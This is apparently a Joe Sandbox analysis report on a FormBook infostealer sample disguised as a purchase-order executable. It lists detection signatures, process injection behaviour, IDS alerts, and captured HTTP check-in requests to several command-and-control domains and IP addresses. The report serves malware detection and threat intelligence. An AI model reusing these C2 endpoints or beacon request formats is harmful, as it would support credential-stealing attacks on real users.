Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO No. 0146850827805 HSP00598420.exe

Overview

General Information

Sample name:PO No. 0146850827805 HSP00598420.exe
Analysis ID:1592547
MD5:bd83674d593f0dbb40a73b74046e5e9c
SHA1:cd27963d0fee77c8defd60da3db84e271c6eba91
SHA256:544af6e22350e213364a80dda48697330f3fb55e542df51a0686a0e4861a8a2a
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • PO No. 0146850827805 HSP00598420.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exe" MD5: BD83674D593F0DBB40A73B74046E5E9C)
    • DlLArodfwUXcDj.exe (PID: 3304 cmdline: "C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • fc.exe (PID: 6548 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)
        • firefox.exe (PID: 6976 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3919504279.00000000030C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.2422961999.0000000005A70000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.3926275354.0000000008440000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.3920082555.0000000003470000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.PO No. 0146850827805 HSP00598420.exe.f10000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-16T09:24:34.698021+010020507451Malware Command and Control Activity Detected192.168.2.54991547.83.1.9080TCP
              2025-01-16T09:24:58.544666+010020507451Malware Command and Control Activity Detected192.168.2.54997884.32.84.3280TCP
              2025-01-16T09:25:11.930780+010020507451Malware Command and Control Activity Detected192.168.2.549983172.67.182.19880TCP
              2025-01-16T09:25:25.734250+010020507451Malware Command and Control Activity Detected192.168.2.549987134.122.133.8080TCP
              2025-01-16T09:25:39.017009+010020507451Malware Command and Control Activity Detected192.168.2.549991199.192.21.16980TCP
              2025-01-16T09:25:52.795249+010020507451Malware Command and Control Activity Detected192.168.2.549995154.197.162.23980TCP
              2025-01-16T09:26:15.294725+010020507451Malware Command and Control Activity Detected192.168.2.549999134.122.133.8080TCP
              2025-01-16T09:26:29.598381+010020507451Malware Command and Control Activity Detected192.168.2.55000347.83.1.9080TCP
              2025-01-16T09:26:42.843250+010020507451Malware Command and Control Activity Detected192.168.2.550007188.114.96.380TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-16T09:24:34.698021+010028554651A Network Trojan was detected192.168.2.54991547.83.1.9080TCP
              2025-01-16T09:24:58.544666+010028554651A Network Trojan was detected192.168.2.54997884.32.84.3280TCP
              2025-01-16T09:25:11.930780+010028554651A Network Trojan was detected192.168.2.549983172.67.182.19880TCP
              2025-01-16T09:25:25.734250+010028554651A Network Trojan was detected192.168.2.549987134.122.133.8080TCP
              2025-01-16T09:25:39.017009+010028554651A Network Trojan was detected192.168.2.549991199.192.21.16980TCP
              2025-01-16T09:25:52.795249+010028554651A Network Trojan was detected192.168.2.549995154.197.162.23980TCP
              2025-01-16T09:26:15.294725+010028554651A Network Trojan was detected192.168.2.549999134.122.133.8080TCP
              2025-01-16T09:26:29.598381+010028554651A Network Trojan was detected192.168.2.55000347.83.1.9080TCP
              2025-01-16T09:26:42.843250+010028554651A Network Trojan was detected192.168.2.550007188.114.96.380TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-16T09:24:50.437047+010028554641A Network Trojan was detected192.168.2.54997584.32.84.3280TCP
              2025-01-16T09:24:53.123372+010028554641A Network Trojan was detected192.168.2.54997684.32.84.3280TCP
              2025-01-16T09:24:55.724590+010028554641A Network Trojan was detected192.168.2.54997784.32.84.3280TCP
              2025-01-16T09:25:04.279631+010028554641A Network Trojan was detected192.168.2.549980172.67.182.19880TCP
              2025-01-16T09:25:06.811625+010028554641A Network Trojan was detected192.168.2.549981172.67.182.19880TCP
              2025-01-16T09:25:09.399284+010028554641A Network Trojan was detected192.168.2.549982172.67.182.19880TCP
              2025-01-16T09:25:18.072833+010028554641A Network Trojan was detected192.168.2.549984134.122.133.8080TCP
              2025-01-16T09:25:20.608460+010028554641A Network Trojan was detected192.168.2.549985134.122.133.8080TCP
              2025-01-16T09:25:23.165366+010028554641A Network Trojan was detected192.168.2.549986134.122.133.8080TCP
              2025-01-16T09:25:31.377652+010028554641A Network Trojan was detected192.168.2.549988199.192.21.16980TCP
              2025-01-16T09:25:33.932220+010028554641A Network Trojan was detected192.168.2.549989199.192.21.16980TCP
              2025-01-16T09:25:36.462963+010028554641A Network Trojan was detected192.168.2.549990199.192.21.16980TCP
              2025-01-16T09:25:45.120603+010028554641A Network Trojan was detected192.168.2.549992154.197.162.23980TCP
              2025-01-16T09:25:47.652543+010028554641A Network Trojan was detected192.168.2.549993154.197.162.23980TCP
              2025-01-16T09:25:50.221410+010028554641A Network Trojan was detected192.168.2.549994154.197.162.23980TCP
              2025-01-16T09:26:07.657469+010028554641A Network Trojan was detected192.168.2.549996134.122.133.8080TCP
              2025-01-16T09:26:10.214881+010028554641A Network Trojan was detected192.168.2.549997134.122.133.8080TCP
              2025-01-16T09:26:12.769081+010028554641A Network Trojan was detected192.168.2.549998134.122.133.8080TCP
              2025-01-16T09:26:21.783376+010028554641A Network Trojan was detected192.168.2.55000047.83.1.9080TCP
              2025-01-16T09:26:24.351040+010028554641A Network Trojan was detected192.168.2.55000147.83.1.9080TCP
              2025-01-16T09:26:26.958056+010028554641A Network Trojan was detected192.168.2.55000247.83.1.9080TCP
              2025-01-16T09:26:35.237672+010028554641A Network Trojan was detected192.168.2.550004188.114.96.380TCP
              2025-01-16T09:26:37.767417+010028554641A Network Trojan was detected192.168.2.550005188.114.96.380TCP
              2025-01-16T09:26:40.317110+010028554641A Network Trojan was detected192.168.2.550006188.114.96.380TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: PO No. 0146850827805 HSP00598420.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://www.adadev.info/ctdy/Avira URL Cloud: Label: malware
              Source: http://www.adadev.info/ctdy/?ml=PF-8nXUHD&R4Stj2k=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZHUsO9SJV5WPis6dAAfaCKHAM87QjltbifMPVPoLSKwbdMw==Avira URL Cloud: Label: malware
              Source: http://www.gayhxi.info/k2i2/?R4Stj2k=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTaAffH6Ebl78vR8bpDnW8pt5wmDRx2PwDjv0U4337vN//Tw==&ml=PF-8nXUHDAvira URL Cloud: Label: malware
              Source: http://www.promocao.info/zaz4/Avira URL Cloud: Label: malware
              Source: http://www.promocao.info/zaz4/?R4Stj2k=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddjkJxjmB725u/4P9m9WNTMgvCSsWrKIDHmR4Q2StU9f7tIQ==&ml=PF-8nXUHDAvira URL Cloud: Label: malware
              Multi AV Scanner detection for submitted file
              Source: PO No. 0146850827805 HSP00598420.exeVirustotal: Detection: 69%Perma Link
              Source: PO No. 0146850827805 HSP00598420.exeReversingLabs: Detection: 68%
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.PO No. 0146850827805 HSP00598420.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3919504279.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2422961999.0000000005A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3926275354.0000000008440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3920082555.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3920171472.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3920397657.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2419345292.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: PO No. 0146850827805 HSP00598420.exeJoe Sandbox ML: detected
              Source: PO No. 0146850827805 HSP00598420.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: PO No. 0146850827805 HSP00598420.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2417757352.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2417757352.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DlLArodfwUXcDj.exe, 00000003.00000002.3919488077.00000000003FE000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2326927222.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000002.2418789448.00000000010FE000.00000040.00001000.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2324389294.0000000000B15000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3920347727.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2420588892.00000000036C9000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3920347727.0000000003870000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2418064008.0000000003518000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: PO No. 0146850827805 HSP00598420.exe, PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2326927222.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000002.2418789448.00000000010FE000.00000040.00001000.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2324389294.0000000000B15000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000004.00000002.3920347727.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2420588892.00000000036C9000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3920347727.0000000003870000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2418064008.0000000003518000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030DC870 FindFirstFileW,FindNextFileW,FindClose,4_2_030DC870
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 4x nop then pop edi3_2_08482EA2
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 4x nop then pop edi3_2_08482F0D
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 4x nop then pop edi3_2_08471F1C
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 4x nop then xor eax, eax3_2_08477780
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 4x nop then pop edi3_2_08473FA1
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then xor eax, eax4_2_030C9EC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then pop edi4_2_030CE4C7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then mov ebx, 00000004h4_2_037104CE

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49915 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49915 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49978 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49980 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49982 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49987 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49987 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49986 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49999 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49999 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49983 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49983 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49975 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49984 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49977 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49976 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49978 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50003 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50003 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49995 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49995 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50007 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50007 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49991 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49991 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 188.114.96.3:80
              Source: Joe Sandbox ViewIP Address: 154.197.162.239 154.197.162.239
              Source: Joe Sandbox ViewIP Address: 172.67.182.198 172.67.182.198
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /k2i2/?R4Stj2k=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTaAffH6Ebl78vR8bpDnW8pt5wmDRx2PwDjv0U4337vN//Tw==&ml=PF-8nXUHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.gayhxi.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /zaz4/?R4Stj2k=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddjkJxjmB725u/4P9m9WNTMgvCSsWrKIDHmR4Q2StU9f7tIQ==&ml=PF-8nXUHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.promocao.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /kxtt/?R4Stj2k=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXj2cOA9AsjjYxFgIbzI/ZykrVUFshkofZlIAuVzcX4MBGxA==&ml=PF-8nXUHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.grimbo.boatsConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /a59t/?R4Stj2k=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acsoaYUTukUw5/VlLJHlB4H68wgcF/MAlZiH8mu7MSOf5Syg==&ml=PF-8nXUHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.44756.pizzaConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /bowc/?R4Stj2k=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO84RxecymeNEzyLIaWcKrL+RZ5eMRfwg+qeUwmqwyFGBk9g==&ml=PF-8nXUHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.lonfor.websiteConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /cf9p/?R4Stj2k=tknvN2jlhTuvpXXfB7aTVyatH+optGyLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFI57Xl4izZbo5Nf+t7hBu9DYDZsVVcrRpMjG9JV+RkwAygg==&ml=PF-8nXUHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.investshares.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /jpjz/?R4Stj2k=BsCB6j6XIP/wuAb0HPY9posnISoRnnooDDFnz1MrtzBPzJTq92en/EOyrjYaLx3w2H4L+FlVDICDydTs7KXcXHKBDP7KaxaAnbP80R2HqmHJM+3O9yicYOmuDElRRJIzTA==&ml=PF-8nXUHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.jrcov55qgcxp5fwa.topConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /ctdy/?ml=PF-8nXUHD&R4Stj2k=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZHUsO9SJV5WPis6dAAfaCKHAM87QjltbifMPVPoLSKwbdMw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.adadev.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
